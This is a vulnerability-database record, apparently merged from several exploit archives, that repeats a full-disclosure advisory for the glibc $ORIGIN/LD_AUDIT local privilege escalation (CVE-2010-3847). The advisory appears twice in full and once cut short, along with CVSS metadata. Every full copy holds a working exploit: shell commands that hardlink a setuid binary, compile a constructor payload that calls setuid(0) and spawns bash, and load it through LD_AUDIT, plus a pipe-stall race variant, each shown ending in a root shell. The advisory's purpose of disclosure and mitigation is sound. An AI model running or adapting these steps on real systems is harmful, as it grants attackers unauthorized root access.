Vulnerability", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-1894", "CVE-2010-3847"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-70027", "id": "SSV:70027", "sourceData": "\n from: http://marc.info/?l=full-disclosure&m=128739684614072&w=2\r\n\r\nThe GNU C library dynamic linker expands $ORIGIN in setuid library search path\r\n------------------------------------------------------------------------------\r\n\r\nGruezi, This is CVE-2010-3847.\r\n\r\nThe dynamic linker (or dynamic loader) is responsible for the runtime linking of\r\ndynamically linked programs. 
ld.so operates in two security modes, a permissive\r\nmode that allows a high degree of control over the load operation, and a secure\r\nmode (libc_enable_secure) intended to prevent users from interfering with the\r\nloading of privileged executables.\r\n\r\n$ORIGIN is an ELF substitution sequence representing the location of the\r\nexecutable being loaded in the filesystem hierarchy. The intention is to allow\r\nexecutables to specify a search path for libraries that is relative to their\r\nlocation, to simplify packaging without spamming the standard search paths with\r\nsingle-use libraries.\r\n\r\nNote that despite the confusing naming convention, $ORIGIN is specified in a\r\nDT_RPATH or DT_RUNPATH dynamic tag inside the executable itself, not via the\r\nenvironment (developers would normally use the -rpath ld parameter, or\r\n-Wl,-rpath,$ORIGIN via the compiler driver).\r\n\r\nThe ELF specification suggests that $ORIGIN be ignored for SUID and SGID\r\nbinaries,\r\n\r\nhttp://web.archive.org/web/20041026003725/http://www.caldera.com/developers/gabi/2003-12-17/ch5.dynamic.html#substitution\r\n\r\n"For security, the dynamic linker does not allow use of $ORIGIN substitution\r\n sequences for set-user and set-group ID programs. For such sequences that\r\n appear within strings specified by DT_RUNPATH dynamic array entries, the\r\n specific search path containing the $ORIGIN sequence is ignored (though other\r\n search paths in the same string are processed). $ORIGIN sequences within a\r\n DT_NEEDED entry or path passed as a parameter to dlopen() are treated as\r\n errors. The same restrictions may be applied to processes that have more than\r\n minimal privileges on systems with installed extended security mechanisms."\r\n\r\nHowever, glibc ignores this recommendation. 
The attack the ELF designers were\r\nlikely concerned about is users creating hardlinks to suid executables in\r\ndirectories they control and then executing them, thus controlling the\r\nexpansion of $ORIGIN.\r\n\r\nIt is tough to form a thorough complaint about this glibc behaviour however,\r\nas any developer who believes they're smart enough to safely create suid\r\nprograms should be smart enough to understand the implications of $ORIGIN\r\nand hard links on load behaviour. The glibc maintainers are some of the\r\nsmartest guys in free software, and well known for having a "no hand-holding"\r\nstance on various issues, so I suspect they wanted a better argument than this\r\nfor modifying the behaviour (I pointed it out a few years ago, but there was\r\nlittle interest).\r\n\r\nHowever, I have now discovered a way to exploit this. The origin expansion\r\nmechanism is recycled for use in LD_AUDIT support, although an attempt is made\r\nto prevent it from working, it is insufficient.\r\n\r\nLD_AUDIT is intended for use with the linker auditing api (see the rtld-audit\r\nmanual), and has the usual restrictions for setuid programs as LD_PRELOAD does.\r\nHowever, $ORIGIN expansion is only prevented if it is not used in isolation.\r\n\r\nThe codepath that triggers this expansion is\r\n\r\n _dl_init_paths() -> _dl_dst_substitute() -> _is_dst()\r\n\r\n(in the code below DST is dynamic string token)\r\n\r\nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l741\r\n\r\n 741 /* Expand DSTs. */\r\n 742 size_t cnt = DL_DST_COUNT (llp, 1);\r\n 743 if (__builtin_expect (cnt == 0, 1))\r\n 744 llp_tmp = strdupa (llp);\r\n 745 else\r\n 746 {\r\n 747 /* Determine the length of the substituted string. */\r\n 748 size_t total = DL_DST_REQUIRED (l, llp, strlen (llp), cnt);\r\n 749\r\n 750 /* Allocate the necessary memory. 
*/\r\n 751 llp_tmp = (char *) alloca (total + 1);\r\n 752 llp_tmp = _dl_dst_substitute (l, llp, llp_tmp, 1);\r\n 753 }\r\n\r\nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l245\r\n\r\n 253 if (__builtin_expect (*name == '$', 0))\r\n 254 {\r\n 255 const char *repl = NULL;\r\n 256 size_t len;\r\n 257\r\n 258 ++name;\r\n 259 if ((len = is_dst (start, name, "ORIGIN", is_path,\r\n 260 INTUSE(__libc_enable_secure))) != 0)\r\n 261 {\r\n ...\r\n 267 repl = l->l_origin;\r\n 268 }\r\n\r\nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l171\r\n\r\n\r\n 202 if (__builtin_expect (secure, 0)\r\n 203 && ((name[len] != '\\0' && (!is_path || name[len] != ':'))\r\n 204 || (name != start + 1 && (!is_path || name[-2] != ':'))))\r\n 205 return 0;\r\n 206\r\n 207 return len;\r\n 208 }\r\n\r\nAs you can see, $ORIGIN is only expanded if it is alone and first in the path.\r\nThis makes little sense, and does not appear to be useful even if there were\r\nno security impact. This was most likely the result of an attempt to re-use the\r\nexisting DT_NEEDED resolution infrastructure for LD_AUDIT support, accidentally\r\nintroducing this error.\r\n\r\nPerhaps surprisingly, this error is exploitable.\r\n\r\n--------------------\r\nAffected Software\r\n------------------------\r\n\r\nAt least the following versions have been tested\r\n\r\n 2.12.1, FC13\r\n 2.5, RHEL5 / CentOS5\r\n\r\nOther versions are probably affected, possibly via different vectors. I'm aware\r\nseveral versions of ld.so in common use hit an assertion in dl_open_worker, I\r\ndo not know if it's possible to avoid this.\r\n\r\n--------------------\r\nConsequences\r\n-----------------------\r\n\r\nIt is possible to exploit this flaw to execute arbitrary code as root.\r\n\r\nPlease note, this is a low impact vulnerability that is only of interest to\r\nsecurity professionals and system administrators. 
End users do not need\r\nto be concerned.\r\n\r\nExploitation would look like the following.\r\n\r\n# Create a directory in /tmp we can control.\r\n$ mkdir /tmp/exploit\r\n\r\n# Link to an suid binary, thus changing the definition of $ORIGIN.\r\n$ ln /bin/ping /tmp/exploit/target\r\n\r\n# Open a file descriptor to the target binary (note: some users are surprised\r\n# to learn exec can be used to manipulate the redirections of the current\r\n# shell if a command is not specified. This is what is happening below).\r\n$ exec 3< /tmp/exploit/target\r\n\r\n# This descriptor should now be accessible via /proc.\r\n$ ls -l /proc/$$/fd/3\r\nlr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target*\r\n\r\n# Remove the directory previously created\r\n$ rm -rf /tmp/exploit/\r\n\r\n# The /proc link should still exist, but now will be marked deleted.\r\n$ ls -l /proc/$$/fd/3\r\nlr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted)\r\n\r\n# Replace the directory with a payload DSO, thus making $ORIGIN a valid target to dlopen().\r\n$ cat > payload.c\r\nvoid __attribute__((constructor)) init()\r\n{\r\n setuid(0);\r\n system("/bin/bash");\r\n}\r\n^D\r\n$ gcc -w -fPIC -shared -o /tmp/exploit payload.c\r\n$ ls -l /tmp/exploit\r\n-rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit*\r\n\r\n# Now force the link in /proc to load $ORIGIN via LD_AUDIT.\r\n$ LD_AUDIT="\\$ORIGIN" exec /proc/self/fd/3\r\nsh-4.1# whoami\r\nroot\r\nsh-4.1# id\r\nuid=0(root) gid=500(taviso)\r\n\r\n-------------------\r\nMitigation\r\n-----------------------\r\n\r\nIt is a good idea to prevent users from creating files on filesystems mounted\r\nwithout nosuid. 
The following interesting solution for administrators who\r\ncannot modify their partitioning scheme was suggested to me by Rob Holland\r\n(@robholland):\r\n\r\nYou can use bind mounts to make directories like /tmp, /var/tmp, etc., nosuid,\r\nfor example:\r\n\r\n# mount -o bind /tmp /tmp\r\n# mount -o remount,bind,nosuid /tmp /tmp\r\n\r\nBe aware of race conditions at boot via crond/atd/etc, and users with\r\nreferences to existing directories (man lsof), but this may be an acceptable\r\nworkaround until a patch is ready for deployment.\r\n\r\n(Of course you need to do this everywhere untrusted users can make links to\r\nsuid/sgid binaries. find(1) is your friend).\r\n\r\nIf someone wants to create an init script that would automate this at boot for\r\ntheir distribution, I'm sure it would be appreciated by other administrators.\r\n\r\n-------------------\r\nSolution\r\n-----------------------\r\n\r\nMajor distributions should be releasing updated glibc packages shortly.\r\n\r\n-------------------\r\nCredit\r\n-----------------------\r\n\r\nThis bug was discovered by Tavis Ormandy.\r\n\r\n-------------------\r\nGreetz\r\n-----------------------\r\n\r\nGreetz to Hawkes, Julien, LiquidK, Lcamtuf, Neel, Spoonm, Felix, Robert,\r\nAsirap, Spender, Pipacs, Gynvael, Scarybeasts, Redpig, Kees, Eugene, Bruce D.,\r\nand all my other elite friends and colleagues.\r\n\r\nAdditional greetz to the openwall guys who saw this problem coming years ago.\r\nThey continue to avoid hundreds of security vulnerabilities each year thanks to\r\ntheir insight into systems security.\r\n\r\nhttp://www.openwall.com/owl/\r\n\r\n-------------------\r\nNotes\r\n-----------------------\r\n\r\nThere are several known techniques to exploit dynamic loader bugs for suid\r\nbinaries, the fexecve() technique listed in the Consequences section above is a\r\nmodern technique, making use of relatively recent Linux kernel features (it was\r\nfirst suggested to me by Adam Langley while discussing 
CVE-2009-1894, but I\r\nbelieve Gabriel Campana came up with the same solution independently).\r\n\r\nThe classic UNIX technique is a little less elegant, but has the advantage that\r\nread access is not required for the target binary. It is rather common for\r\nadministrators to remove read access from suid binaries in order to make\r\nattackers work a little harder, so I will document it here for reference.\r\n\r\nThe basic idea is to create a pipe(), fill it up with junk (pipes have 2^16\r\nbytes capacity on Linux, see the section on "Pipe Capacity" in pipe(7) from the\r\nLinux Programmers Manual), then dup2() it to stderr. Following the dup2(),\r\nanything written to stderr will block, so you simply execve() and then make the\r\nloader print some error message, allowing you to reliably win any race\r\ncondition.\r\n\r\nLD_DEBUG has always been a good candidate for getting error messages on\r\nLinux. The behaviour of LD_DEBUG was modified a few years ago in response to\r\nsome minor complaints about information leaks, but it can still be used with a\r\nslight modification (I first learned of this technique from a bugtraq posting\r\nby Jim Paris in 2004, http://seclists.org/bugtraq/2004/Aug/281).\r\n\r\nThe exploit flow for this alternative attack is a little more complicated, but\r\nwe can still use the shell to do it (this session is from an FC13 system,\r\noutput cleaned up for clarity).\r\n\r\n# Almost fill up a pipe with junk, then dup2() it to stderr using redirection.\r\n$ (head -c 65534 /dev/zero; LD_DEBUG=nonsense LD_AUDIT="\\$ORIGIN" /tmp/exploit/target 2>&1) | (sleep 1h; cat) &\r\n[1] 26926\r\n\r\n# Now ld.so is blocked on write() in the background trying to say "invalid\r\n# debug option", so we are free to manipulate the filesystem.\r\n$ rm -rf /tmp/exploit/\r\n\r\n# Put exploit payload in place.\r\n$ gcc -w -fPIC -shared -o /tmp/exploit payload.c\r\n\r\n# Clear the pipe by killing sleep, letting cat drain the contents. 
This will\r\n# unblock the target, allowing it to continue.\r\n$ pkill -n -t $(tty | sed 's#/dev/##') sleep\r\n-bash: line 99: 26929 Terminated sleep 1h\r\n\r\n# And now we can take control of a root shell :-)\r\n$ fg\r\nsh-4.1# id\r\nuid=0(root) gid=500(taviso)\r\n\r\nAnother technique I'm aware of is setting a ridiculous LD_HWCAP_MASK, then\r\nwhile the loader is trying to map lots of memory, you have a good chance of\r\nwinning any race. I previously found an integer overflow in this feature and\r\nsuggested adding LD_HWCAP_MASK to the unsecure vars list, however the glibc\r\nmaintainers disagreed and just fixed the overflow.\r\n\r\nhttp://www.cygwin.com/ml/libc-hacker/2007-07/msg00001.html\r\n\r\nI believe this is still a good idea, and LD_HWCAP_MASK is where I would bet the\r\nnext big loader bug is going to be, it's just not safe to let attackers have\r\nthat much control over the execution environment of privileged programs.\r\n\r\nFinally, some notes on ELF security for newcomers. The following common\r\nconditions are usually exploitable:\r\n\r\n - An empty DT_RPATH, i.e. -Wl,-rpath,""\r\n This is a surprisingly common build error, due to variable expansion\r\n failing during the build process.\r\n - A relative, rather than absolute DT_RPATH.\r\n For example, -Wl,-rpath,"lib/foo".\r\n\r\nI'll leave it as an exercise for the interested reader to explain why. Remember\r\nto also follow DT_NEEDED dependencies, as dependencies can also declare rpaths\r\nfor their dependencies, and so on.\r\n\r\n-------------------\r\nReferences\r\n-----------------------\r\n\r\n- http://man.cx/ld.so%288%29, The dynamic linker/loader, Linux Programmer's Manual.\r\n- http://man.cx/rtld-audit, The auditing API for the dynamic linker, Linux Programmer's Manual.\r\n- http://man.cx/pipe%287%29, Overview of pipes and FIFOs (Pipe Capacity), Linux Programmer's Manual.\r\n- Linkers and Loaders, John R. 
Levine, ISBN 1-55860-496-0.\r\n- Partitioning schemes and security, http://my.opera.com/taviso/blog/show.dml/654574\r\n- CVE-2009-1894 description, http://blog.cr0.org/2009/07/old-school-local-root-vulnerability-in.html\r\n\r\nYou should subscribe to Linux Weekly News and help support their high standard\r\nof security journalism.\r\n\r\nhttp://lwn.net/\r\n\r\nI have a twitter account where I occasionally comment on security topics.\r\n\r\nhttp://twitter.com/taviso\r\n\r\nex$$\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-70027", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2021-06-08T19:10:23", "description": "Race condition on temporary files creation allow symlink attack.", "edition": 2, "cvss3": {}, "published": "2009-07-18T00:00:00", "title": "PulseAudio race conditions", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2009-07-18T00:00:00", "id": "SECURITYVULNS:VULN:10079", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10079", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:17", "description": "\nGNU C library dynamic linker - $ORIGIN Expansion", "edition": 2, "cvss3": {}, "published": "2010-10-18T00:00:00", "title": "GNU C library dynamic linker - $ORIGIN Expansion", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1894", "CVE-2010-3847"], "modified": 
"2010-10-18T00:00:00", "id": "EXPLOITPACK:FC124E21A6FD828BCB8AB10DC2D60915", "href": "", "sourceData": "from: http://marc.info/?l=full-disclosure&m=128739684614072&w=2\n\nThe GNU C library dynamic linker expands $ORIGIN in setuid library search path\n------------------------------------------------------------------------------\n\nGruezi, This is CVE-2010-3847.\n\nThe dynamic linker (or dynamic loader) is responsible for the runtime linking of\ndynamically linked programs. ld.so operates in two security modes, a permissive\nmode that allows a high degree of control over the load operation, and a secure\nmode (libc_enable_secure) intended to prevent users from interfering with the\nloading of privileged executables.\n\n$ORIGIN is an ELF substitution sequence representing the location of the\nexecutable being loaded in the filesystem hierarchy. The intention is to allow\nexecutables to specify a search path for libraries that is relative to their\nlocation, to simplify packaging without spamming the standard search paths with\nsingle-use libraries.\n\nNote that despite the confusing naming convention, $ORIGIN is specified in a\nDT_RPATH or DT_RUNPATH dynamic tag inside the executable itself, not via the\nenvironment (developers would normally use the -rpath ld parameter, or\n-Wl,-rpath,$ORIGIN via the compiler driver).\n\nThe ELF specification suggests that $ORIGIN be ignored for SUID and SGID\nbinaries,\n\nhttp://web.archive.org/web/20041026003725/http://www.caldera.com/developers/gabi/2003-12-17/ch5.dynamic.html#substitution\n\n\"For security, the dynamic linker does not allow use of $ORIGIN substitution\n sequences for set-user and set-group ID programs. For such sequences that\n appear within strings specified by DT_RUNPATH dynamic array entries, the\n specific search path containing the $ORIGIN sequence is ignored (though other\n search paths in the same string are processed). 
$ORIGIN sequences within a\n DT_NEEDED entry or path passed as a parameter to dlopen() are treated as\n errors. The same restrictions may be applied to processes that have more than\n minimal privileges on systems with installed extended security mechanisms.\"\n\nHowever, glibc ignores this recommendation. The attack the ELF designers were\nlikely concerned about is users creating hardlinks to suid executables in\ndirectories they control and then executing them, thus controlling the\nexpansion of $ORIGIN.\n\nIt is tough to form a thorough complaint about this glibc behaviour however,\nas any developer who believes they're smart enough to safely create suid\nprograms should be smart enough to understand the implications of $ORIGIN\nand hard links on load behaviour. The glibc maintainers are some of the\nsmartest guys in free software, and well known for having a \"no hand-holding\"\nstance on various issues, so I suspect they wanted a better argument than this\nfor modifying the behaviour (I pointed it out a few years ago, but there was\nlittle interest).\n\nHowever, I have now discovered a way to exploit this. The origin expansion\nmechanism is recycled for use in LD_AUDIT support, although an attempt is made\nto prevent it from working, it is insufficient.\n\nLD_AUDIT is intended for use with the linker auditing api (see the rtld-audit\nmanual), and has the usual restrictions for setuid programs as LD_PRELOAD does.\nHowever, $ORIGIN expansion is only prevented if it is not used in isolation.\n\nThe codepath that triggers this expansion is\n\n _dl_init_paths() -> _dl_dst_substitute() -> _is_dst()\n\n(in the code below DST is dynamic string token)\n\nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l741\n\n 741 /* Expand DSTs. 
*/\n 742 size_t cnt = DL_DST_COUNT (llp, 1);\n 743 if (__builtin_expect (cnt == 0, 1))\n 744 llp_tmp = strdupa (llp);\n 745 else\n 746 {\n 747 /* Determine the length of the substituted string. */\n 748 size_t total = DL_DST_REQUIRED (l, llp, strlen (llp), cnt);\n 749\n 750 /* Allocate the necessary memory. */\n 751 llp_tmp = (char *) alloca (total + 1);\n 752 llp_tmp = _dl_dst_substitute (l, llp, llp_tmp, 1);\n 753 }\n\nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l245\n\n 253 if (__builtin_expect (*name == '$', 0))\n 254 {\n 255 const char *repl = NULL;\n 256 size_t len;\n 257\n 258 ++name;\n 259 if ((len = is_dst (start, name, \"ORIGIN\", is_path,\n 260 INTUSE(__libc_enable_secure))) != 0)\n 261 {\n ...\n 267 repl = l->l_origin;\n 268 }\n\nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l171\n\n\n 202 if (__builtin_expect (secure, 0)\n 203 && ((name[len] != '\\0' && (!is_path || name[len] != ':'))\n 204 || (name != start + 1 && (!is_path || name[-2] != ':'))))\n 205 return 0;\n 206\n 207 return len;\n 208 }\n\nAs you can see, $ORIGIN is only expanded if it is alone and first in the path.\nThis makes little sense, and does not appear to be useful even if there were\nno security impact. This was most likely the result of an attempt to re-use the\nexisting DT_NEEDED resolution infrastructure for LD_AUDIT support, accidentally\nintroducing this error.\n\nPerhaps surprisingly, this error is exploitable.\n\n--------------------\nAffected Software\n------------------------\n\nAt least the following versions have been tested\n\n 2.12.1, FC13\n 2.5, RHEL5 / CentOS5\n\nOther versions are probably affected, possibly via different vectors. 
I'm aware\nseveral versions of ld.so in common use hit an assertion in dl_open_worker, I\ndo not know if it's possible to avoid this.\n\n--------------------\nConsequences\n-----------------------\n\nIt is possible to exploit this flaw to execute arbitrary code as root.\n\nPlease note, this is a low impact vulnerability that is only of interest to\nsecurity professionals and system administrators. End users do not need\nto be concerned.\n\nExploitation would look like the following.\n\n# Create a directory in /tmp we can control.\n$ mkdir /tmp/exploit\n\n# Link to an suid binary, thus changing the definition of $ORIGIN.\n$ ln /bin/ping /tmp/exploit/target\n\n# Open a file descriptor to the target binary (note: some users are surprised\n# to learn exec can be used to manipulate the redirections of the current\n# shell if a command is not specified. This is what is happening below).\n$ exec 3< /tmp/exploit/target\n\n# This descriptor should now be accessible via /proc.\n$ ls -l /proc/$$/fd/3\nlr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target*\n\n# Remove the directory previously created\n$ rm -rf /tmp/exploit/\n\n# The /proc link should still exist, but now will be marked deleted.\n$ ls -l /proc/$$/fd/3\nlr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted)\n\n# Replace the directory with a payload DSO, thus making $ORIGIN a valid target to dlopen().\n$ cat > payload.c\nvoid __attribute__((constructor)) init()\n{\n setuid(0);\n system(\"/bin/bash\");\n}\n^D\n$ gcc -w -fPIC -shared -o /tmp/exploit payload.c\n$ ls -l /tmp/exploit\n-rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit*\n\n# Now force the link in /proc to load $ORIGIN via LD_AUDIT.\n$ LD_AUDIT=\"\\$ORIGIN\" exec /proc/self/fd/3\nsh-4.1# whoami\nroot\nsh-4.1# id\nuid=0(root) gid=500(taviso)\n\n-------------------\nMitigation\n-----------------------\n\nIt is a good idea to prevent users from creating files on filesystems 
mounted\nwithout nosuid. The following interesting solution for administrators who\ncannot modify their partitioning scheme was suggested to me by Rob Holland\n(@robholland):\n\nYou can use bind mounts to make directories like /tmp, /var/tmp, etc., nosuid,\nfor example:\n\n# mount -o bind /tmp /tmp\n# mount -o remount,bind,nosuid /tmp /tmp\n\nBe aware of race conditions at boot via crond/atd/etc, and users with\nreferences to existing directories (man lsof), but this may be an acceptable\nworkaround until a patch is ready for deployment.\n\n(Of course you need to do this everywhere untrusted users can make links to\nsuid/sgid binaries. find(1) is your friend).\n\nIf someone wants to create an init script that would automate this at boot for\ntheir distribution, I'm sure it would be appreciated by other administrators.\n\n-------------------\nSolution\n-----------------------\n\nMajor distributions should be releasing updated glibc packages shortly.\n\n-------------------\nCredit\n-----------------------\n\nThis bug was discovered by Tavis Ormandy.\n\n-------------------\nGreetz\n-----------------------\n\nGreetz to Hawkes, Julien, LiquidK, Lcamtuf, Neel, Spoonm, Felix, Robert,\nAsirap, Spender, Pipacs, Gynvael, Scarybeasts, Redpig, Kees, Eugene, Bruce D.,\nand all my other elite friends and colleagues.\n\nAdditional greetz to the openwall guys who saw this problem coming years ago.\nThey continue to avoid hundreds of security vulnerabilities each year thanks to\ntheir insight into systems security.\n\nhttp://www.openwall.com/owl/\n\n-------------------\nNotes\n-----------------------\n\nThere are several known techniques to exploit dynamic loader bugs for suid\nbinaries, the fexecve() technique listed in the Consequences section above is a\nmodern technique, making use of relatively recent Linux kernel features (it was\nfirst suggested to me by Adam Langley while discussing CVE-2009-1894, but I\nbelieve Gabriel Campana came up with the same solution 
independently).\n\nThe classic UNIX technique is a little less elegant, but has the advantage that\nread access is not required for the target binary. It is rather common for\nadministrators to remove read access from suid binaries in order to make\nattackers work a little harder, so I will document it here for reference.\n\nThe basic idea is to create a pipe(), fill it up with junk (pipes have 2^16\nbytes capacity on Linux, see the section on \"Pipe Capacity\" in pipe(7) from the\nLinux Programmers Manual), then dup2() it to stderr. Following the dup2(),\nanything written to stderr will block, so you simply execve() and then make the\nloader print some error message, allowing you to reliably win any race\ncondition.\n\nLD_DEBUG has always been a a good candidate for getting error messages on\nLinux. The behaviour of LD_DEBUG was modified a few years ago in response to\nsome minor complaints about information leaks, but it can still be used with a\nslight modification (I first learned of this technique from a bugtraq posting\nby Jim Paris in 2004, http://seclists.org/bugtraq/2004/Aug/281).\n\nThe exploit flow for this alternative attack is a little more complicated, but\nwe can still use the shell to do it (this session is from an FC13 system,\noutput cleaned up for clarity).\n\n# Almost fill up a pipe with junk, then dup2() it to stderr using redirection.\n$ (head -c 65534 /dev/zero; LD_DEBUG=nonsense LD_AUDIT=\"\\$ORIGIN\" /tmp/exploit/target 2>&1) | (sleep 1h; cat) &\n[1] 26926\n\n# Now ld.so is blocked on write() in the background trying to say \"invalid\n# debug option\", so we are free to manipulate the filesystem.\n$ rm -rf /tmp/exploit/\n\n# Put exploit payload in place.\n$ gcc -w -fPIC -shared -o /tmp/exploit payload.c\n\n# Clear the pipe by killing sleep, letting cat drain the contents. 
This will\n# unblock the target, allowing it to continue.\n$ pkill -n -t $(tty | sed 's#/dev/##') sleep\n-bash: line 99: 26929 Terminated sleep 1h\n\n# And now we can take control of a root shell :-)\n$ fg\nsh-4.1# id\nuid=0(root) gid=500(taviso)\n\nAnother technique I'm aware of is setting a ridiculous LD_HWCAP_MASK, then\nwhile the loader is trying to map lots of memory, you have a good chance of\nwinning any race. I previously found an integer overflow in this feature and\nsuggested adding LD_HWCAP_MASK to the unsecure vars list, however the glibc\nmaintainers disagreed and just fixed the overflow.\n\nhttp://www.cygwin.com/ml/libc-hacker/2007-07/msg00001.html\n\nI believe this is still a good idea, and LD_HWCAP_MASK is where I would bet the\nnext big loader bug is going to be, it's just not safe to let attackers have\nthat much control over the execution environment of privileged programs.\n\nFinally, some notes on ELF security for newcomers. The following common\nconditions are usually exploitable:\n\n - An empty DT_RPATH, i.e. -Wl,-rpath,\"\"\n This is a surprisingly common build error, due to variable expansion\n failing during the build process.\n - A relative, rather than absolute DT_RPATH.\n For example, -Wl,-rpath,\"lib/foo\".\n\nI'll leave it as an exercise for the interested reader to explain why. Remember\nto also follow DT_NEEDED dependencies, as dependencies can also declare rpaths\nfor their dependencies, and so on.\n\n-------------------\nReferences\n-----------------------\n\n- http://man.cx/ld.so%288%29, The dynamic linker/loader, Linux Programmer's Manual.\n- http://man.cx/rtld-audit, The auditing API for the dynamic linker, Linux Programmer's Manual.\n- http://man.cx/pipe%287%29, Overview of pipes and FIFOs (Pipe Capacity), Linux Programmer's Manual.\n- Linkers and Loaders, John R. 
Levine, ISBN 1-55860-496-0.\n- Partitioning schemes and security, http://my.opera.com/taviso/blog/show.dml/654574\n- CVE-2009-1894 description, http://blog.cr0.org/2009/07/old-school-local-root-vulnerability-in.html\n\nYou should subscribe to Linux Weekly News and help support their high standard\nof security journalism.\n\nhttp://lwn.net/\n\nI have a twitter account where I occasionally comment on security topics.\n\nhttp://twitter.com/taviso\n\nex$$", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:19:55", "description": "", "cvss3": {}, "published": "2010-10-19T00:00:00", "type": "packetstorm", "title": "GNU C Library Dynamic Linker $ORIGIN Expansion Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-1894", "CVE-2010-3847"], "modified": "2010-10-19T00:00:00", "id": "PACKETSTORM:94955", "href": "https://packetstormsecurity.com/files/94955/GNU-C-Library-Dynamic-Linker-ORIGIN-Expansion-Vulnerability.html", "sourceData": "`The GNU C library dynamic linker expands $ORIGIN in setuid library search path \n------------------------------------------------------------------------------ \n \nGruezi, This is CVE-2010-3847. \n \nThe dynamic linker (or dynamic loader) is responsible for the runtime linking of \ndynamically linked programs. ld.so operates in two security modes, a permissive \nmode that allows a high degree of control over the load operation, and a secure \nmode (libc_enable_secure) intended to prevent users from interfering with the \nloading of privileged executables. \n \n$ORIGIN is an ELF substitution sequence representing the location of the \nexecutable being loaded in the filesystem hierarchy. The intention is to allow \nexecutables to specify a search path for libraries that is relative to their \nlocation, to simplify packaging without spamming the standard search paths with \nsingle-use libraries. 
\n \nNote that despite the confusing naming convention, $ORIGIN is specified in a \nDT_RPATH or DT_RUNPATH dynamic tag inside the executable itself, not via the \nenvironment (developers would normally use the -rpath ld parameter, or \n-Wl,-rpath,$ORIGIN via the compiler driver). \n \nThe ELF specification suggests that $ORIGIN be ignored for SUID and SGID \nbinaries, \n \nhttp://web.archive.org/web/20041026003725/http://www.caldera.com/developers/gabi/2003-12-17/ch5.dynamic.html#substitution \n \n\"For security, the dynamic linker does not allow use of $ORIGIN substitution \nsequences for set-user and set-group ID programs. For such sequences that \nappear within strings specified by DT_RUNPATH dynamic array entries, the \nspecific search path containing the $ORIGIN sequence is ignored (though other \nsearch paths in the same string are processed). $ORIGIN sequences within a \nDT_NEEDED entry or path passed as a parameter to dlopen() are treated as \nerrors. The same restrictions may be applied to processes that have more than \nminimal privileges on systems with installed extended security mechanisms.\" \n \nHowever, glibc ignores this recommendation. The attack the ELF designers were \nlikely concerned about is users creating hardlinks to suid executables in \ndirectories they control and then executing them, thus controlling the \nexpansion of $ORIGIN. \n \nIt is tough to form a thorough complaint about this glibc behaviour however, \nas any developer who believes they're smart enough to safely create suid \nprograms should be smart enough to understand the implications of $ORIGIN \nand hard links on load behaviour. The glibc maintainers are some of the \nsmartest guys in free software, and well known for having a \"no hand-holding\" \nstance on various issues, so I suspect they wanted a better argument than this \nfor modifying the behaviour (I pointed it out a few years ago, but there was \nlittle interest). 
